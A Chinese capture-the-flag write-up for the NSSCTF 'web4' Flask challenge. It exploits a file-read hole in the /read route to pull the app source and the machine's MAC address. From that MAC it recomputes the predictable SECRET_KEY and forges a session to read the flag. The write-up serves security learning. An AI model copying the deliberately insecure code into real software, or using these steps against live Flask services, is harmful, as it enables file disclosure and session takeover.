当前位置: 首页 > news >正文

Flask任意文件读取+session伪造-NSSCTF-web4

1、打开环境,有个超链接readSomtthing,直接跳转到百度首页。

2、观察跳转URL,IP:PORT/read?url=https://baidu.com。结合提示,可能存在任意文件读取漏洞。

3、使用url= /proc/self/cmdline 读取当前进程对应的终端命令时,发现了app.py。审计代码:

# encoding:utf-8 import re, random, uuid, urllib from flask import Flask, session, request app = Flask(__name__) random.seed(uuid.getnode()) #用mac地址作为种子 app.config['SECRET_KEY'] = str(random.random() * 233) #根据上面的Mac地址,生成密钥。 app.debug = True @app.route('/') def index(): session['username'] = 'www-data' #当前用户 return 'Hello World! Read somethings' @app.route('/read') def read(): try: url = request.args.get('url') m = re.findall('^file.*', url, re.IGNORECASE) n = re.findall('flag', url, re.IGNORECASE) if m or n: return 'No Hack' res = urllib.urlopen(url) return res.read() except Exception as ex: print str(ex) return 'no response' @app.route('/flag') def flag(): if session and session['username'] == 'fuck': #需要让username = fuck,才会读取flag return open('/flag.txt').read() else: return 'Access denied' if __name__ == '__main__': app.run(debug=True, host="0.0.0.0")

可以确定,当前用户是www-data,路由为/。当用户为fuck,路由为/flag时,可以读取flag。由此,需要进行session伪造。

4、session伪造必须要知道scret_key,代码里给出了方法:

random.seed(uuid.getnode()) #用mac地址作为种子 app.config['SECRET_KEY'] = str(random.random() * 233) #根据上面的Mac地址,生成密钥。

根据url=/sys/class/net/eth0/address拿到mac地址:02:42:ac:02:16:63。开始生成scret_key(这里需要使用python2,因为这个题目的环境是2,生成密钥用3的话,长度会长一些,伪造结果不对):

import random random.seed(0x0242ac021663) #也可以转为十进制的2485376915043 print(str(random.random()*233))

结果:10.937048099。

5、拿到scret_key之后,尝试对当前的session解密,看看对不对:

用户:www-data,说明密钥是正确的,开始伪造fuck的session:

刚开始用单引号报错,后来使用双引号正常出来session。替换、刷新、才出现flag。

6、/read路由过滤了flag、file关键字,也可以考虑编码绕过直接读取flag。

http://www.jsqmd.com/news/102043/

相关文章:

  • 计算机毕业设计springboot面向煤矿井下人员的不安全行为管理系统 基于 Spring Boot 的煤矿井下人员安全行为监管系统设计与实现 Spring Boot 框架下煤矿井下人员不安全行为监测
  • 接口与实现分离:从 SPI 到 OSGi、SOFAArk的模块化演进
  • SPFA算法
  • 高频Jmeter软件测试面试题
  • 揭秘私有化Dify用户管理体系:如何实现精细化权限分配与安全审计
  • 多传感器融合与空间解算:微型矿用定向传感器工作原理综述
  • 大模型教我成为大模型算法工程师之day14: 目标检测 (Object Detection)
  • 【Dify系统性能突破】:基于混合检索架构的响应时间压缩秘籍
  • 大模型教我成为大模型算法工程师之day15: 图像分割 (Image Segmentation)
  • 1、云、虚拟化与数据存储网络:从挑战到机遇的旅程
  • 构建ros2的节点工程,并创建python的ros2的包的方法过程(推荐)
  • 2、云、虚拟化与数据存储网络:从挑战到机遇
  • 3、云、虚拟化与数据存储网络基础全解析
  • Python学习第一天:保留字和标识符
  • 痛击面试官!CURD系统也能做出技术含量
  • Java计算机毕设之基基于javaweb的特色小零食销售系统的设计与实现于javaweb的小零食销售系统的设计与实现(完整前后端代码+说明文档+LW,调试定制等)
  • 揭秘Dify Agent版本混乱难题:3步实现精准版本管控
  • 私有化Dify端口配置实战(从零到上线的完整配置方案)
  • Java面试Redis核心知识点整理!
  • 从入门到精通:Dify平台下Tesseract自定义词典创建全流程(附真实案例)
  • C++编译死机排查工具与实战指南
  • C++ Template(模板)解读和模板报错如何“逆向阅读”定位
  • 2025年低成本学AI:几款高性价比认证盘点(200元起)
  • 【高阶技术揭秘】:从Dify日志看懂重排序算法的隐秘逻辑
  • 应届生看过来!2025年轻松入手的几款AI认证(低费用+高认可度)
  • Avalon-MM address和DRAM address地址映射
  • 还在为多语言语音识别发愁?Dify 1.7.0一招破解行业痛点
  • 【Docker Scout漏洞修复全流程】:手把手教你7步闭环响应安全威胁
  • 深度剖析Dify PDF解密失败根源(附完整错误代码对照表)
  • 多模态媒介宣发技术架构解析:Infoseek 如何实现效率 10 倍提升?